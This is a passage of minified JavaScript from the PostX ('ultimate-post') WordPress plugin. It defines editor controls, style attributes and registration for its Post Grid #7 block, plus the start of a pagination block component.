Spacing","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.Cz,include:(0,a.cr)({include:a._y,exclude:"__all",title:__("Meta Texts","ultimate-post")}),store:t,label:__("Meta Texts","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Meta Settings","ultimate-post"),styleTitle:__("Meta Style","ultimate-post"),settingsKeys:a.G7,styleKeys:a.hd,oArgs:a.jK,incSettings:[{position:1,data:a.do},{position:3,data:a.Rd},{position:4,data:a.WD},{position:7,data:a.MF}],exStyle:["metaTypo","metaMargin","metaPadding","metaSpacing"],exSettings:["metaSeparator","metaStyle","metaList","metaListSmall"]}));case"read-more":return(0,o.createElement)(r.Z,{text:"Read More"},(0,o.createElement)(a.sT,{store:t,attrKey:"readMoreTypo",label:__("Read More Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.NJ)({include:["readMoreSacing","readMorePadding"],exclude:"__all",title:__("Read More Spacing","ultimate-post")}),store:t,label:__("Read More Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Read More Settings","ultimate-post"),styleTitle:__("Read More Style","ultimate-post"),settingsKeys:a.qM,styleKeys:a.ad,oArgs:a.e5,exStyle:["readMoreTypo","readMoreSacing","readMorePadding"],incSettings:[{position:0,data:{type:"toggle",key:"showSmallBtn",label:__("Small Item Read More","ultimate-post")}}]}));case"cat":return(0,o.createElement)(r.Z,{text:"Taxonomy/Category",pro:!0},(0,o.createElement)(a.sT,{store:t,attrKey:"catTypo",label:__("Category Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.v9)({include:["catSacing","catPadding"],exclude:"__all",title:__("Category Spacing","ultimate-post")}),store:t,label:__("Category Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Category Settings","ultimate-post"),styleTitle:__("Category Style","ultimate-post"),settingsKeys:a.eC,styleKeys:a.EK,oArgs:a.op,exStyle:["catPosition","catTypo","catSacing","catPadding"],exSettings:["catPosition"],incSettings:[{position:0,data:{type:"toggle",key:"showSmallCat",label:__("Small Item Category","ultimate-post")}},{position:1,data:a.WJ}]}));case"image":return(0,o.createElement)(r.Z,{text:"Image"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Image Settings","ultimate-post"),styleTitle:__("Image Style","ultimate-post"),settingsKeys:a.pj,styleKeys:a.hH,oArgs:a.Po,exSettings:["imgMargin","imgWidth","imageScale","imgHeight"],exStyle:["imgMargin","imgWidth","imageScale","imgHeight"],incSettings:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}]}));default:return null}}},37602:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(92165),a=l(73151),i=l(51579);const n={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"string",default:"layout1"},headingShow:{type:"boolean",default:!0},excerptShow:{type:"boolean",default:!0},filterShow:{type:"boolean",default:!1,style:[{depends:[{key:"queryType",condition:"!=",value:["posts","customPosts"]}]}]},paginationShow:{type:"boolean",default:!1},contentTag:{type:"string",default:"div"},openInTab:{type:"boolean",default:!1},notFoundMessage:{type:"string",default:"No Post Found"},columnGridGap:{type:"object",default:{lg:"5",unit:"px"},style:[{selector:"{{ULTP}} .ultp-layout1 .ultp-block-item:first-child .ultp-block-content-overlay, \n          {{ULTP}} .ultp-layout1 .ultp-block-item:nth-child(2) .ultp-block-content-overlay { height: calc(100% + {{columnGridGap}}); } \n          {{ULTP}} .ultp-block-row { grid-row-gap: {{columnGridGap}}; } \n          {{ULTP}} .ultp-block-row {grid-column-gap: {{columnGridGap}}; }"}]},overlayHeight:{type:"object",default:{lg:"500",unit:"px"},style:[{selector:"{{ULTP}} .ultp-layout4 .ultp-block-item:nth-child(2) .ultp-block-content-overlay, \n          {{ULTP}} .ultp-layout4 .ultp-block-item:nth-child(3) .ultp-block-content-overlay, \n          {{ULTP}} .ultp-layout1 .ultp-block-item:nth-child(3) .ultp-block-content-overlay, \n          {{ULTP}} .ultp-layout1 .ultp-block-item:nth-child(4) .ultp-block-content-overlay {height: calc({{overlayHeight}}/2);} \n          {{ULTP}} .ultp-layout1 .ultp-block-item:first-child, \n          {{ULTP}} .ultp-layout1 .ultp-block-item:nth-child(2) {max-height: {{overlayHeight}};} \n          {{ULTP}} .ultp-block-row {max-height: {{overlayHeight}};} \n          {{ULTP}} .ultp-block-item .ultp-block-image img, \n          {{ULTP}} .ultp-block-empty-image, \n          {{ULTP}} .ultp-block-row .ultp-block-item:first-child .ultp-block-image img, \n          {{ULTP}} .ultp-block-row .ultp-block-item:first-child .ultp-block-empty-image {width: 100%; object-fit: cover; height: 100%; } \n          {{ULTP}} .ultp-layout3 .ultp-block-item .ultp-block-image img, \n          {{ULTP}} .ultp-layout2 .ultp-block-item .ultp-block-image img {height: {{overlayHeight}};} \n          {{ULTP}} .ultp-layout1 .ultp-block-item:nth-child(2) .ultp-block-image img {min-height: {{overlayHeight}};} \n          @media (max-width: 768px) { \n            {{ULTP}} .ultp-block-item .ultp-block-content-overlay .ultp-block-image img, \n            {{ULTP}} .ultp-block-content-overlay .ultp-block-empty-image { height: calc( {{overlayHeight}}/2 ); min-height: inherit;}\n          }"}]},queryNumber:{type:"string",default:"4",style:[{depends:[{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]}]}]},titleShow:{type:"boolean",default:!0},titleTag:{type:"string",default:"h3"},titleAnimation:{type:"string",default:""},titlePosition:{type:"boolean",default:!0},titleColor:{type:"string",default:"#fff",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a { color:{{titleColor}} !important; }"}]},titleHoverColor:{type:"string",default:"rgba(255,255,255,0.70)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a:hover { color:{{titleHoverColor}} !important; }"}]},titleLgTypo:{type:"object",default:{openTypography:1,size:{lg:"28",xs:"18",unit:"px"},height:{lg:"32",unit:"px"},decoration:"none",family:"",weight:"700"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:first-child .ultp-block-title, \n          {{ULTP}} .ultp-block-item:first-child .ultp-block-title a, \n          {{ULTP}} .ultp-layout4 .ultp-block-item:nth-child(4) .ultp-block-title, \n          {{ULTP}} .ultp-layout4 .ultp-block-item:nth-child(4) .ultp-block-title a"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:"20",xs:"14",unit:"px"},height:{lg:"26",unit:"px"},decoration:"none",family:"",weight:"600"},style:[{depends:[{key:"titleShow",condition:"==",value:!0},{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-items-wrap:not(.ultp-layout4) .ultp-block-item:not(:first-child) .ultp-block-title, \n          {{ULTP}} .ultp-block-items-wrap:not(.ultp-layout4) .ultp-block-item:not(:first-child) .ultp-block-title a, \n          {{ULTP}} .ultp-layout4 .ultp-block-item:not(:first-child):not(:nth-child(4)) .ultp-block-title, \n          {{ULTP}} .ultp-layout4 .ultp-block-item:not(:first-child):not(:nth-child(4)) .ultp-block-title a "}]},titlePadding:{type:"object",default:{lg:{top:10,bottom:5,unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title { padding:{{titlePadding}}; }"}]},titleLength:{type:"string",default:0},titleBackground:{type:"string",default:"",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title a { padding: 2px 7px; -webkit-box-decoration-break: clone; box-decoration-break: clone; background-color:{{titleBackground}}; }"}]},showImage:{type:"boolean",default:!0},imgCrop:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_landscape",depends:[{key:"showImage",condition:"==",value:!0}]},imgCropSmall:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_square",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"gridStyle",condition:"!=",value:"style1"}]}]},imgAnimation:{type:"string",default:"zoomIn"},imgGrayScale:{type:"object",default:{lg:"0",ulg:"%",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image img { filter: grayscale({{imgGrayScale}}); }"}]},imgHoverGrayScale:{type:"object",default:{lg:"0",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image img { filter: grayscale({{imgHoverGrayScale}}); }"}]},imgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-wrap, \n          {{ULTP}} .ultp-block-image { border-radius:{{imgRadius}}; }"}]},imgHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-wrap:hover, \n          {{ULTP}} .ultp-block-content-wrap:hover .ultp-block-image { border-radius:{{imgHoverRadius}}; }"}]},imgShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-overlay"}]},imgHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-content-overlay"}]},imgOverlay:{type:"boolean",default:!0},imgOverlayType:{type:"string",default:"simgleGradient",style:[{depends:[{key:"imgOverlay",condition:"==",value:!0}]}]},overlayColor:{type:"object",default:{openColor:1,type:"color",color:"#0e1523"},style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before"}]},imgOpacity:{type:"string",default:.7,style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before { opacity: {{imgOpacity}}; }"}]},fallbackEnable:{type:"boolean",default:!0,style:[{depends:[{key:"showImage",condition:"==",value:!0}]}]},fallbackImg:{type:"object",default:"",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"fallbackEnable",condition:"==",value:!0}]}]},imgSrcset:{type:"boolean",default:!1},imgLazy:{type:"boolean",default:!1},showSmallBtn:{type:"boolean",default:!1},metaListSmall:{type:"string",default:'["metaDate"]'},showSmallCat:{type:"boolean",default:!1},showSeoMeta:{type:"boolean",default:!1},showSmallExcerpt:{type:"boolean",default:!1},showFullExcerpt:{type:"boolean",default:!1,style:[{depends:[{key:"showSeoMeta",condition:"==",value:!1}]}]},excerptLimit:{type:"string",default:20,style:[{depends:[{key:"showFullExcerpt",condition:"==",value:!1}]}]},excerptColor:{type:"string",default:"#fff",style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, \n        {{ULTP}} .ultp-block-excerpt p { color:{{excerptColor}}; }"}]},excerptTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, \n          {{ULTP}} .ultp-block-excerpt p"}]},excerptPadding:{type:"object",default:{lg:{top:15,bottom:"",unit:"px"}},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt { padding: {{excerptPadding}}; }"}]},contentAlign:{type:"string",default:"left",style:[{depends:[{key:"contentAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta { justify-content: flex-start; }"},{depends:[{key:"contentAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta { justify-content: center; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta {justify-content: flex-end;} \n          .rtl {{ULTP}} .ultp-block-meta {justify-content: start;}"},{depends:[{key:"contentAlign",condition:"==",value:"right"},{key:"readMore",condition:"==",value:!0}],selector:".rtl {{ULTP}} .ultp-block-readmore a {display:flex; flex-direction:row-reverse; justify-content: flex-end;}"}]},overlayContentPosition:{type:"string",default:"bottomPosition",style:[{depends:[{key:"overlayContentPosition",condition:"==",value:"topPosition"}],selector:"{{ULTP}} .ultp-block-content-topPosition { align-items:flex-start; }"},{depends:[{key:"overlayContentPosition",condition:"==",value:"middlePosition"}],selector:"{{ULTP}} .ultp-block-content-middlePosition { align-items:center; }"},{depends:[{key:"overlayContentPosition",condition:"==",value:"bottomPosition"}],selector:"{{ULTP}} .ultp-block-content-bottomPosition { align-items:flex-end; }"}]},overlayBgColor:{type:"object",default:{openColor:1,type:"color",color:""},style:[{selector:"{{ULTP}} .ultp-block-content-inner"}]},overlayWrapPadding:{type:"object",default:{lg:{top:"20",bottom:"20",left:"20",right:"20",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-inner { padding: {{overlayWrapPadding}}; }"}]},titleStyle:{type:"string",default:"none"},titleAnimColor:{type:"string",default:"black",style:[{depends:[{key:"titleStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-title-style1 a {  cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.35s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-title-style2 a:hover {  border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-title-style3 a {  text-decoration: none; $thetransition: all 1s cubic-bezier(1,.25,0,.75) 0s; position: relative; transition: all 0.35s ease-out; padding-bottom: 3px; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-title-style4 a { cursor: pointer; font-weight: 600; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a:hover{ text-decoration: none; transition: all 0.35s ease-out; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-size:auto; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); } "},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-title-style6 a{ background-image: linear-gradient(120deg, {{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 2px; background-position: 0 88%; transition: background-size 0.15s ease-in; padding: 5px 5px; }"},{depends:[{key:"titleStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-title-style7 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: right 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-title-style8 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: center 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-title-style9 a { background-image: linear-gradient(120deg,{{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 10px; background-position: 0 88%; transition: 0.3s ease-in; padding: 3px 5px; } "}]},headingText:{type:"string",default:"Post Grid #7"},filterBelowTitle:{type:"boolean",default:!1,style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { position: relative; display: block; margin: auto 0 0 0; height: auto;}"}]},filterAlign:{type:"object",default:{lg:""},style:[{depends:[{key:"filterBelowTitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { text-align:{{filterAlign}}; }"}]},filterType:{type:"string",default:"category"},filterText:{type:"string",default:"all"},filterValue:{type:"string",default:"[]",style:[{depends:[{key:"filterType",condition:"!=",value:""}]}]},fliterTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:22,unit:"px"},decoration:"none",family:"",weight:500},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a"}]},filterColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a { color:{{filterColor}}; }\n          {{ULTP}} .flexMenu-viewMore a:before { border-color:{{filterColor}}}"}]},filterHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a:hover, \n          {{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a.filter-active { color:{{filterHoverColor}} !important; } \n          {{ULTP}} .ultp-flex-menu .flexMenu-viewMore a:hover::before { border-color:{{filterHoverColor}}}"}]},filterBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { background:{{filterBgColor}}; }"}]},filterHoverBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover, \n          {{ULTP}} .ultp-filter-wrap ul li.filter-item > a.filter-active, \n          {{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore > a:hover { background:{{filterHoverBgColor}}; }"}]},filterBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a"}]},filterHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover"}]},filterRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { border-radius:{{filterRadius}}; }"}]},fliterSpacing:{type:"object",default:{lg:{top:"",bottom:"",right:"",left:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li { margin:{{fliterSpacing}}; }"}]},fliterPadding:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a, \n          {{ULTP}} .ultp-filter-wrap .flexMenu-viewMore > a { padding:{{fliterPadding}}; }"}]},filterDropdownColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a { color:{{filterDropdownColor}}; }"}]},filterDropdownHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a:hover { color:{{filterDropdownHoverColor}}; }"}]},filterDropdownBg:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { background:{{filterDropdownBg}}; }"}]},filterDropdownRadius:{type:"object",default:{lg:{top:2,right:2,bottom:2,left:2,unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { border-radius:{{filterDropdownRadius}}; }"}]},filterDropdownPadding:{type:"object",default:{lg:{top:"15",bottom:"15",left:"20",right:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { padding:{{filterDropdownPadding}}; }"}]},filterMobile:{type:"boolean",default:!0},filterMobileText:{type:"string",default:"More",style:[{depends:[{key:"filterMobile",condition:"==",value:!0}]}]},paginationType:{type:"string",default:"navigation"},...(0,o.t)(["advFilter","pagiBlockCompatibility","heading","advanceAttr","pagination","video","meta","category","readMore","query"],["paginationText","loadMoreText","paginationAjax","pagiMargin","queryNumPosts"],[{key:"pagiAlign",default:{lg:"left"}},{key:"metaSeparator",default:"emptyspace"},{key:"metaList",default:'["metaAuthor","metaDate"]'},{key:"metaColor",default:"#F3F3F3"},{key:"metaSeparatorColor",default:"#b3b3b3"},{key:"metaSpacing",default:{lg:"15",unit:"px"}},{key:"catLineColor",default:"var(--postx_preset_Base_2_color)"},{key:"catLineHoverColor",default:"var(--postx_preset_Base_2_color)"},{key:"catHoverColor",default:"var(--postx_preset_Over_Primary_color)"},{key:"readMoreColor",default:"#fff"},{key:"readMoreBgColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Primary_color)"}},{key:"readMoreBgHoverColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Secondary_color)"}}]),V4_1_0_CompCheck:a.O,...(0,i.b)({defColor:"#fff"})}},83674:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(67594),n=l(12705),r=l(37602),s=l(40577);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/post-grid-7/","block_docs"),p(s,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/post-grid-7.svg"}),attributes:r.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/postgrid7.svg"}},transforms:{to:[...(0,i.Z)("ultimate-post/post-grid-7")]},edit:n.Z,save:()=>null})},74711:(e,t,l)=>{"use strict";l.d(t,{Z:()=>d});var o=l(67294),a=l(53049),i=l(99838),n=l(87025),r=l(37679);const{useBlockProps:s}=wp.blockEditor,{useEffect:p}=wp.element,{useSelect:c}=wp.data,u="ultimate-post/post-pagination";function d({attributes:e,setAttributes:t,clientId:l,context:d}){const{blockId:m,paginationType:g,paginationNav:y,paginationAjax:b,paginationText:v,loadMoreText:h,postId:f}=e;p((()=>{t({blockId:l.slice(-6),postId:d.postId})}),[f]);const k=c((e=>{const t=d["post-grid-parent/postBlockClientId"];if(!t)return!1;const l=e("core/block-editor").getBlocks(t);return(0,n.FL)(l).filter((e=>e.name.includes("advanced-filter"))).length>0}),[d["post-grid-parent/postBlockClientId"]]);p((()=>{k&&!b&&t({paginationAjax:!0})}),[k,b]),p((()=>{(0,n.IG)(d["post-grid-parent/postBlockClientId"],{paginationType:g,paginationNav:y,paginationAjax:b,paginationText:v,loadMoreText:h,navPosition:"bottom"})}),[g,y,b,v,h]);const w=s({className:`ultp-block-${m} ultp-pagination-block ultp-pagination-wrap`});let x;return m&&(x=(0,i.Kh)(e,u,m,(0,a.k0)())),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(r.ZP,{attributes:e,setAttributes:t,name:u,clientId:l,forceAjax:k}),x&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:x}}),(0,o.createElement)("div",w,"loadMore"==g&&(0,a.Bv)(h),"navigation"==g&&(0,a.pI)(),"pagination"==g&&(0,a.fF)(y,b,v)))}},37679:(e,t,l)=>{"use strict";l.d(t,{ZP:()=>v});var o=l(67294),a=l(53049),i=l(13448),n=l(87025),r=l(92637);const{BlockControls:s}=wp.blockEditor,{ToolbarGroup:p}=wp.components,{__}=wp.i18n,{InspectorControls:c}=wp.blockEditor,u=["paginationType","loadMoreText","paginationText","pagiAlign","paginationNav","paginationAjax"],d=["pagiTypo","pagiArrowSize","pagiTab","pagiMargin","navMargin","pagiPadding"],m=[{data:{type:"tag",key:"paginationType",label:__("Pagination Type","ultimate-post"),options:[{value:"loadMore",label:__("Loadmore","ultimate-post")},{value:"navigation",label:__("Navigation","ultimate-post")},{value:"pagination",label:__("Pagination","ultimate-post")}]}},{data:{type:"text",key:"loadMoreText",label:__("Loadmore Text","ultimate-post")}},{data:{type:"text",key:"paginationText",label:__("Pagination Text","ultimate-post")}},{data:{type:"alignment",key:"pagiAlign",responsive:!0,label:__("Alignment","ultimate-post"),disableJustify:!0}},{data:{type:"select",key:"paginationNav",label:__("Pagination","ultimate-post"),options:[{value:"textArrow",label:__("Text & Arrow","ultimate-post")},{value:"onlyarrow",label:__("Only Arrow","ultimate-post")}]}},{data:{type:"toggle",key:"paginationAjax",label:__("Ajax Pagination","ultimate-post")}}],g=(e=!1)=>e?m.map((e=>"paginationAjax"===e.data.key?{data:{...e.data,disabled:!0,showDisabledValue:!0,help:n.p2}}:e)):m,y=[{data:{type:"typography",key:"pagiTypo",label:__("Typography","ultimate-post")}},{data:{type:"range",key:"pagiArrowSize",min:0,max:100,step:1,responsive:!0,label:__("Arrow Size","ultimate-post")}},{data:{type:"tab",key:"pagiTab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"pagiColor",label:__("Color","ultimate-post"),clip:!0},{type:"color2",key:"pagiBgColor",label:__("Background Color","ultimate-post")},{type:"border",key:"pagiBorder",label:__("Border","ultimate-post")},{type:"boxshadow",key:"pagiShadow",label:__("BoxShadow","ultimate-post")},{type:"dimension",key:"pagiRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"pagiHoverColor",label:__("Hover Color","ultimate-post"),clip:!0},{type:"color2",key:"pagiHoverbg",label:__("Hover Bg Color","ultimate-post")},{type:"border",key:"pagiHoverBorder",label:__("Hover Border","ultimate-post")},{type:"boxshadow",key:"pagiHoverShadow",label:__("BoxShadow","ultimate-post")},{type:"dimension",key:"pagiHoverRadius",label:__("Hover 